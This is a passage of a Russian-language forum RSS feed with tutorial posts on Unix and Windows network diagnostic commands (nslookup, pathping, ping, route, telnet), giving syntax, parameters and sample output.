0x0, ttl&amp;#160; 64, id 3938, offset 0, flags [DF], proto: TCP (6),&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; length: 627) 192.168.5.23.52348 &amp;gt; 213.180.204.11.80: P 0:587(587) ack 1 win 5840&lt;br /&gt;&amp;#160; &amp;#160; ...&lt;/p&gt;
						&lt;p&gt;nmap&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда nmap – сетевой сканер, с помощью которого можно определить уязвимость удалённых хостов. Основное назначение этой программы – определение состояние портов удалённого хоста (закрыты они, открыты или заблокированны). Также программа может на основании собственной базы знаний определить по поведению удалённого хоста, какая операционная система запущена на нём.&lt;/p&gt;
						&lt;p&gt;Команды удалённого терминала&lt;/p&gt;
						&lt;p&gt;telnet&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; telnet – программа сетевого терминала. &lt;br /&gt;ssh&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Программа ssh является более современным и защищённым аналогом программы telnet. &lt;/p&gt;
						&lt;p&gt;Команды по управлению сетевым экраном&lt;/p&gt;
						&lt;p&gt;iptables&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда iptables является интерфейсом к межсетевому экрану ядра Linux. &lt;/p&gt;
						&lt;p&gt;Резюме&lt;/p&gt;
						&lt;p&gt;В этом разделе описываются основные команды по управлению и диагностике сети в UNIX.&lt;/p&gt;
						&lt;p&gt;Ключевые термины: ifconfig, arp, route, ping, traceroute, netstat, host, tcpdump, nmap, telnet, ssh, iptables&lt;br /&gt;Дополнительные материалы&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Курячий Г.В. Операционная система UNIX. – М.:Интуит.Ру, 2004. – 292 с.: ил.&lt;br /&gt;&amp;#160; &amp;#160; Рейчардс К., Фостер-Джонсон Э. UNIX: справочник. – СПб.: Питер Ком, 1999. – 384 с.: ил.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (bash)</author>
			<pubDate>Tue, 10 Mar 2015 14:14:14 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=39#p39</guid>
		</item>
		<item>
			<title>Работа с сетью в командной строке Windows (CMD)</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=38#p38</link>
			<description>&lt;p&gt;Утилита NSLOOKUP&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Утилита NSLOOKUP присутствует во всех версиях операционных систем Windows и является классическим средством диагностики сетевых проблем, связанных с разрешением доменных имен в IP-адреса&amp;#46; NSLOOKUP предоставляет пользователю возможность просмотра базы данных DNS-сервера и построения определенные запросов, для поиска нужных ресурсов DNS&amp;#46; Практически, утилита выполняет функции службы DNS-клиент в командной строке Windows&amp;#46;&lt;/p&gt;
						&lt;p&gt;После запуска, утилита переходит в режим ожидания ввода&amp;#46; Ввод символа ? или команды help позволяет получить подсказку по использованию утилиты&amp;#46;&lt;/p&gt;
						&lt;p&gt;Примеры использования&amp;#58;&lt;/p&gt;
						&lt;p&gt;nslookup - запуск утилиты&lt;br /&gt;yandex&amp;#46;ru&amp;#46; - отобразить IP-адрес (а) узла с именем yandex&amp;#46;ru &amp;#46; Точка в конце имени желательна для минимизации числа запросов на разрешение имени к серверу DNS&amp;#46; Если завершающей точки нет, то NSLOOKUP сначала попытается разрешить указанное имя как часть доменного имени компьютера, на котором она запущена&amp;#46;&lt;br /&gt;server 8&amp;#46;8&amp;#46;4&amp;#46;4 - установить в качестве сервера имен DNS-сервер Google с IP-адресом 8&amp;#46;8&amp;#46;4&amp;#46;4&lt;br /&gt;yandex&amp;#46;ru&amp;#46; - повторить запрос с использованием разрешения имени DNS-сервером Google&amp;#46;&lt;br /&gt;set type=MX - установить тип записи MX&lt;br /&gt;yandex&amp;#46;ru&amp;#46; - отобразить MX-запись для домена yandex&amp;#46;ru - В примере узел обмена почтой для домена - mx&amp;#46;yandex&amp;#46;ru&lt;br /&gt;mx&amp;#46;yandex&amp;#46;ru&amp;#46; - отобразить информацию по mx&amp;#46;yandex&amp;#46;ru&lt;br /&gt;set type=A - установить тип записи в A&lt;br /&gt;mx&amp;#46;yandex&amp;#46;ru - получить IP-адреса для mx&amp;#46;yandex&amp;#46;ru &amp;#46;&lt;br /&gt;exit - завершить работу с nslookup&lt;/p&gt;
						&lt;p&gt;Возможно использование утилиты NSLOOKUP не в интерактивном режиме&amp;#58;&lt;/p&gt;
						&lt;p&gt;nslookup odnoklassniki&amp;#46;ru - определить IP-адрес узла odnokassniki&amp;#46;ru с использованием сервера DNS, заданного настройками сетевого подключения&amp;#46;&lt;br /&gt;nslookup odnoklassniki&amp;#46;ru 8&amp;#46;8&amp;#46;8&amp;#46;8 - определить IP-адрес узла odnokassniki&amp;#46;ru с использованием DNS-сервера 8&amp;#46;8&amp;#46;8&amp;#46;8 (публичный DNS-сервер Google)&lt;br /&gt;nslookup 8&amp;#46;8&amp;#46;8&amp;#46;8 - определить имя узла, IP-адрес которого равен 8&amp;#46;8&amp;#46;8&amp;#46;8 с использованием DNS-сервера, заданного настройками сетевого подключения&amp;#46;&lt;/p&gt;
						&lt;p&gt;Команда nslookup - отдельная статья с описанием команды NSLOOKUP&amp;#46;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Утилита PATHPING&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Команда PATHPING выполняет трассировку маршрута к конечному узлу аналогично команде TRACERT , но дополнительно, выполняет отправку ICMP-эхо запросов на промежуточные узлы маршрута для сбора информации о задержках и потерях пакетов на каждом из них&amp;#46;&lt;/p&gt;
						&lt;p&gt;При запуске PATHPING без параметров, отображается краткая справка&amp;#58;&lt;/p&gt;
						&lt;p&gt;pathping [-g Список] [-h Число_прыжков] [-i Адрес] [-n] [-p Пауза] [-q Число_запросов] [-w Таймаут] [-P] [-R] [-T] [-4] [-6] узел&lt;/p&gt;
						&lt;p&gt;Параметры&amp;#58;&lt;br /&gt;-g Список При прохождении по элементам списка узлов игнорировать предыдущий маршрут&amp;#46; Максимальное число адресов в списке равно 9 &amp;#46; Элементы списка помещаются в специальное поле заголовка отправляемых ICMP-пакетов&amp;#46;&lt;br /&gt;-h Число_прыжков - Максимальное число прыжков при поиске узла&amp;#46; Значение по умолчанию - 30&lt;br /&gt;-i Адрес - Использовать указанный адрес источника в отправляемых ICMP-пакетах&amp;#46;&lt;br /&gt;-n - Не разрешать адреса в имена узлов&amp;#46;&lt;br /&gt;-p Пауза - Пауза между отправками (мсек) пакетов&amp;#46; Значение по умолчанию - 250&amp;#46;&lt;br /&gt;-q Число_запросов Число запросов для каждого узла&amp;#46; По умолчанию - 100&lt;br /&gt;-w Таймаут - Время ожидания каждого ответа (мсек)&amp;#46; Значение по умолчанию - 3000&lt;br /&gt;-R - Тестировать возможность использования RSVP ( Reservation Protocol, протокола настройки резервирования ресурсов), который позволяет динамически выделять ресурсы для различных видов трафика&amp;#46;&lt;br /&gt;-T - Тестировать на возможность использования QoS (Quality of Service - качество обслуживания) - системы обслуживания пакетов разного содержания с учетом их приоритетов доставки получателю&amp;#46;&lt;br /&gt;-4 - Принудительно использовать IPv4&amp;#46;&lt;br /&gt;-6 - Принудительно использовать IPv6&amp;#46;&lt;/p&gt;
						&lt;p&gt;Практически, PATHPING, запущенная на выполнение с параметрами по умолчанию, выполняет те же действия, что и команда TRACERT плюс команды PING для каждого промежуточного узла с указанием числа эхо-запросов, равным 100 (ping -n 100 &amp;#46; &amp;#46; &amp;#46; )&lt;/p&gt;
						&lt;p&gt;Пример результатов выполнения команды pathping yandex&amp;#46;ru &amp;#58;&lt;/p&gt;
						&lt;p&gt;Трассировка маршрута к yandex&amp;#46;ru [77&amp;#46;88&amp;#46;21&amp;#46;11] с максимальным числом прыжков 30&amp;#58;&lt;br /&gt;1 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;br /&gt;2 180&amp;#46;84&amp;#46;250&amp;#46;11&lt;br /&gt;3 180&amp;#46;84&amp;#46;250&amp;#46;53&lt;br /&gt;4 80&amp;#46;184&amp;#46;112&amp;#46;25&lt;br /&gt;5 msk-ix-m9&amp;#46;yandex&amp;#46;net [193&amp;#46;232&amp;#46;244&amp;#46;93]&lt;br /&gt;6 l3-s900-dante&amp;#46;yandex&amp;#46;net [213&amp;#46;180&amp;#46;213&amp;#46;70]&lt;br /&gt;7 s600-s900&amp;#46;yandex&amp;#46;net [213&amp;#46;180&amp;#46;213&amp;#46;54]&lt;br /&gt;8 yandex&amp;#46;ru [77&amp;#46;88&amp;#46;21&amp;#46;11]&lt;/p&gt;
						&lt;p&gt;Подсчет статистики за&amp;#58; 200 сек&amp;#46; &amp;#46; &amp;#46; &amp;#46;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Исходный узел&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Маршрутный узел&lt;br /&gt;Прыжок&amp;#160; &amp;#160; &amp;#160; &amp;#160;RTT&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Утер&amp;#46;/Отпр&amp;#46; %&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Утер&amp;#46;/Отпр&amp;#46; %&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Адрес&lt;/p&gt;
						&lt;p&gt;1&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;1мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;2&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;5мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 180&amp;#46;84&amp;#46;250&amp;#46;11&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;3&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;11мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 3/ 100 = 3%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 180&amp;#46;84&amp;#46;250&amp;#46;53&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;8/ 100 = 8%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;4&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;4мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 80&amp;#46;184&amp;#46;112&amp;#46;25&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;5&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;8мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; msk-ix-m9&amp;#46;yandex&amp;#46;net [193&amp;#46;232&amp;#46;244&amp;#46;93]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;6&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;12мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; l3-s900-dante&amp;#46;yandex&amp;#46;net [213&amp;#46;180&amp;#46;213&amp;#46;70]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;7&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;5мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; s600-s900&amp;#46;yandex&amp;#46;net [213&amp;#46;180&amp;#46;213&amp;#46;54]&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;|&lt;br /&gt;8&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;2мс&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; 0/ 100 = 0%&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; yandex&amp;#46;ru [77&amp;#46;88&amp;#46;21&amp;#46;11]&lt;/p&gt;
						&lt;p&gt;В приведенном примере красным цветом выделен проблемный участок маршрута к конечному узлу с потерей 8% пакетов&amp;#46;&lt;br /&gt;При интерпретации результатов выполнения pathping нужно учитывать тот факт, что некоторые маршрутизаторы могут быть настроены на блокировку icmp-трафика, что не позволяет правильно отработать трассировку, и получить по ним статистические данные&amp;#46;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Утилита PING&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; PING&amp;#46;EXE - это, наверно, наиболее часто используемая сетевая утилита командной строки&amp;#46; Существует во всех версиях всех операционных систем с поддержкой сети и является простым и удобным средством опроса узла по имени или его IP-адресу&amp;#46;&lt;/p&gt;
						&lt;p&gt;Для обмена служебной и диагностической информацией в сети используется специальный протокол управляющих сообщений ICMP (Internet Control Message Protocol)&amp;#46; Команда ping позволяет выполнить отправку управляющего сообщения типа Echo Request (тип равен 8 и указывается в заголовке сообщения) адресуемому узлу и интерпретировать полученный от него ответ в удобном для анализа виде&amp;#46; В поле данных отправляемого icmp-пакета обычно содержатся символы английского алфавита&amp;#46; В ответ на такой запрос, опрашиваемый узел дожжен отправить icmp-пакет с теми же данными, которые были приняты, и типом сообщения Echo Reply (код типа в заголовке равен 0) &amp;#46; Если при обмене icmp-сообщениями возникает какая-либо проблема, то утилита ping выведет информацию для ее диагностики&amp;#46;&lt;/p&gt;
						&lt;p&gt;Формат командной строки&amp;#58;&lt;/p&gt;
						&lt;p&gt;ping [-t] [-a] [-n число] [-l размер] [-f] [-i TTL] [-v TOS] [-r число] [-s число] [[-j списокУзлов] | [-k списокУзлов]] [-w таймаут] конечноеИмя&lt;/p&gt;
						&lt;p&gt;Параметры&amp;#58;&lt;/p&gt;
						&lt;p&gt;-t - Непрерывная отправка пакетов&amp;#46; Для завершения и вывода статистики используются комбинации клавиш Ctrl + Break (вывод статистики), и Ctrl + C (вывод статистики и завершение)&amp;#46;&lt;br /&gt;-a - Определение адресов по именам узлов&amp;#46; -n число - Число отправляемых эхо-запросов&amp;#46;&lt;br /&gt;-l размер - Размер поля данных в байтах отправляемого запроса&amp;#46;&lt;br /&gt;-f - Установка флага, запрещающего фрагментацию пакета&amp;#46;&lt;br /&gt;-i TTL - Задание срока жизни пакета (поле &amp;quot;Time To Live&amp;quot;)&amp;#46;&lt;br /&gt;-v TOS - Задание типа службы (поле &amp;quot;Type Of Service&amp;quot;)&amp;#46;&lt;br /&gt;-r число - Запись маршрута для указанного числа переходов&amp;#46;&lt;br /&gt;-s число - Штамп времени для указанного числа переходов&amp;#46;&lt;br /&gt;-j списокУзлов - Свободный выбор маршрута по списку узлов&amp;#46;&lt;br /&gt;-k списокУзлов - Жесткий выбор маршрута по списку узлов&amp;#46;&lt;br /&gt;-w таймаут - Максимальное время ожидания каждого ответа в миллисекундах&amp;#46;&lt;/p&gt;
						&lt;p&gt;Примеры использования&amp;#58;&lt;/p&gt;
						&lt;p&gt;ping 8&amp;#46;8&amp;#46;8&amp;#46;8 - выполнить опрос узла с IP-адресом 8&amp;#46;8&amp;#46;8&amp;#46;8 с параметрами по умолчанию&amp;#46;&lt;br /&gt;ping -t yandex&amp;#46;ru - выполнять ping до нажатия комбинации CTRL+C, При нажатии CTRL+Break - выдается статистика и опрос узла продолжается&lt;br /&gt;ping -n 1000 -l 500 192&amp;#46;168&amp;#46;1&amp;#46;1 - выполнить ping 1000 раз с использованием сообщений, длиной 500 байт&amp;#46;&lt;br /&gt;ping -a -n 1 -r 9 -w 1000 yandex&amp;#46;ru - выполнить ping 1 раз (ключ -n 1), определять адрес по имени (ключ -a), выдавать маршрут для первых 9 переходов (-r 9), ожидать ответ 1 секунду (1000мсек)&lt;/p&gt;
						&lt;p&gt;Использование ключа -r позволяет получить трассировку маршрута, аналогичную получаемой с помощью команды tracert, но число промежуточных узлов не может превышать 9 &amp;#46;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Утилита ROUTE&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Утилита ROUTE&amp;#46;EXE используется для просмотра и модификации таблицы маршрутов на локальном компьютере&amp;#46; При запуске без параметров, на экран выводится подсказка по использованию route&amp;#58;&lt;/p&gt;
						&lt;p&gt;route [-f] [-p] [команда [конечная_точка] [mask маска_сети] [шлюз] [metric метрика]] [if интерфейс]]&lt;/p&gt;
						&lt;p&gt;-f - используется для сброса таблицы маршрутизации&amp;#46; При выполнении команды route -f из таблицы удаляются все маршруты, которые не относятся к петлевому интерфейсу (IP 127&amp;#46;0&amp;#46;0&amp;#46;1 маска -255&amp;#46;0&amp;#46;0&amp;#46;0), не являются маршрутами для многоадресной (multicast) рассылки (IP 224&amp;#46;0&amp;#46;0&amp;#46;1 маска 255&amp;#46;0&amp;#46;0&amp;#46;0) и не являются узловыми маршрутами (маска равна 255&amp;#46;255&amp;#46;255&amp;#46;255) &amp;#46;&lt;/p&gt;
						&lt;p&gt;-p - используется для добавления в таблицу постоянного маршрута&amp;#46; Если маршрут добавлен без использования параметра -p то он сохраняется только до перезагрузки системы (до перезапуска сетевого системного программного обеспечения)&amp;#46; Если же, при добавлении маршрута искользовался данный параметр, то информация о маршруте записывается в реестр Windows (раздел HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes ) и будет использоваться постоянно при активации сетевых интерфейсов&amp;#46;&lt;/p&gt;
						&lt;p&gt;команда - козможно использование команд add - добавление маршрута, change - изменение существующего маршрута, delete - удаление маршрута или маршрутов, print - отображение текущей таблицы маршрутов&lt;/p&gt;
						&lt;p&gt;конечная_точка - IP-адрес, адрес сети или адрес 0&amp;#46;0&amp;#46;0&amp;#46;0 для шлюза по умолчанию&amp;#46;&lt;/p&gt;
						&lt;p&gt;mask маска_сети - маска сети&amp;#46;&lt;/p&gt;
						&lt;p&gt;шлюз - IP-адрес шлюза, через который будет выполняться отправка пакета для достижения конечной точки&amp;#46;&lt;/p&gt;
						&lt;p&gt;metric число - значение метрики (1-9999)&amp;#46; Метрика представляет собой числовое значение, позволяющее оптимизировать доставку пакета получателю, если конечная точка маршрута может быть достижима по нескольким разным маршрутам&amp;#46; Чем меньше значение метрики, тем выше приоритет маршрута&amp;#46;&lt;/p&gt;
						&lt;p&gt;if интерфейс - идентификатор сетевого интерфейса&amp;#46; Может задаваться в виде десятичного или шестнадцатеричного числа&amp;#46; Посмотреть идентификаторы можно с помщью команды route print&lt;/p&gt;
						&lt;p&gt;Примеры &amp;#58;&lt;/p&gt;
						&lt;p&gt;route print - отобразить текущую таблицу маршрутов&lt;/p&gt;
						&lt;p&gt;route print 192&amp;#46;* - отобразить таблицу маршрутов только для адресов, начинающихся с 192&amp;#46;&lt;/p&gt;
						&lt;p&gt;route add 0&amp;#46;0&amp;#46;0&amp;#46;0 mask 0&amp;#46;0&amp;#46;0&amp;#46;0 192&amp;#46;168&amp;#46;1&amp;#46;1 - установить в качестве шлюза по умолчанию (основного шлюза) адрес 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;/p&gt;
						&lt;p&gt;route -p add 10&amp;#46;0&amp;#46;0&amp;#46;0 mask 255&amp;#46;0&amp;#46;0&amp;#46;0 10&amp;#46;0&amp;#46;0&amp;#46;1 - добавить маршрут для подсети 10&amp;#46;0&amp;#46;0&amp;#46;0/255&amp;#46;0&amp;#46;0&amp;#46;0 и запомнить его в реестре &amp;#46; Постоянный статический маршрут&amp;#46;&lt;/p&gt;
						&lt;p&gt;route delete 10&amp;#46;0&amp;#46;0&amp;#46;0 mask 255&amp;#46;0&amp;#46;0&amp;#46;0 - удалить маршрут для подсети 10&amp;#46;0&amp;#46;0&amp;#46;0/255&amp;#46;0&amp;#46;0&amp;#46;0 &amp;#46;&lt;/p&gt;
						&lt;p&gt;route add 10&amp;#46;10&amp;#46;10&amp;#46;10 192&amp;#46;168&amp;#46;1&amp;#46;158 - добавить маршрут для узла с IP-адресом 10&amp;#46;10&amp;#46;10&amp;#46;10 &amp;#46; Если маска в команде не задана, то подразумевается ее значение равное 255&amp;#46;255&amp;#46;255&amp;#46;255 , т&amp;#46;е конечная точка назначения является одиночным IP-адресом узла&amp;#46;&lt;/p&gt;
						&lt;p&gt;route delete 10&amp;#46;10&amp;#46;10&amp;#46;10 - удалить маршрут созданный предыдущей командой&lt;/p&gt;
						&lt;p&gt;route change 10&amp;#46;0&amp;#46;0&amp;#46;0 mask 255&amp;#46;0&amp;#46;0&amp;#46;0 10&amp;#46;10&amp;#46;10&amp;#46;1 - изменить адрес перехода для существующего маршрута к сети 10&amp;#46;0&amp;#46;0&amp;#46;0/255&amp;#46;0&amp;#46;0&amp;#46;0 на значение 10&amp;#46;10&amp;#46;10&amp;#46;1&lt;/p&gt;
						&lt;p&gt;route -f - очистить таблицу маршрутов&amp;#46; После перезагрузки системы, или при перезапуске сетевых подключений таблица маршрутов будет восстановлена исходя из текущей сетевой конфигурации компьютера&amp;#46;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Утилита TELNET&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; На заре развития сети Интернет, сервис TELNET был основным средством удаленной работы пользователей, реализующим взаимодействие терминала с процессом на удаленном компьютере&amp;#46; На сегодняшний день, TELNET, в основном, используется как средство удаленного администрирования специализированных сетевых устройств&amp;#46; Сервис TELNET входит в состав практически всех сетевых операционных систем и реализован в виде программного обеспечения сервера Telnet и клиентской оболочки с текстовым или графическим интерфейсом&amp;#46; Подключившись к серверу, удаленный пользователь получает доступ к командной строке, поддерживаемой сервером, таким же образом, как если-бы он работал с локальным терминалом&amp;#46; Утилита TELNET работает поверх протокола TCP и позволяет пользователю подключиться к удаленному узлу не только на стандартный порт 23, но и на любой другой TCP-порт, тем самым, позволяя взаимодействовать с любым приложением, управляемым командной строкой&amp;#46; Так, например, с использованием утилиты telnet можно подключиться к серверам, поддерживающим текстовый (telnet-like) ввод команд и данных - SMTP, POP3, IMAP и т&amp;#46;п&amp;#46; Кроме этого, утилиту можно использовать в качестве средства грубой проверки возможности подключения на любой TCP-порт (проверки слушается ли определенный порт TCP)&amp;#46;&lt;/p&gt;
						&lt;p&gt;При запуске TELNET&amp;#46;EXE без параметров, программа переходит в интерактивный режим, ожидая ввода команд пользователем&amp;#46; Для получения списка доступных команд используется ввод знака вопроса или /h &amp;#46; Набор доступных команд может отличаться для разных версий telnet, но всегда будут присутствовать команды подключения к удаленному узлу (open ), закрытия существующего подключения (close ), установки (set ) и сброса (unset параметров&amp;#46;&lt;/p&gt;
						&lt;p&gt;set ? - отобразить текущие параметры сессии&amp;#46; Отображаются параметры, связанные с эмуляцией терминала, режима отображения вводимых символов (локального эха), интерпретацией управляющих последовательностей символов, способа аутентификации&amp;#46;&lt;/p&gt;
						&lt;p&gt;open 192&amp;#46;168&amp;#46;1&amp;#46;1 - подключиться к серверу TELNET узла 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;/p&gt;
						&lt;p&gt;open 192&amp;#46;168&amp;#46;1&amp;#46;1 25 - подключиться к серверу, слушающему порт 25/TCP узла 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;/p&gt;
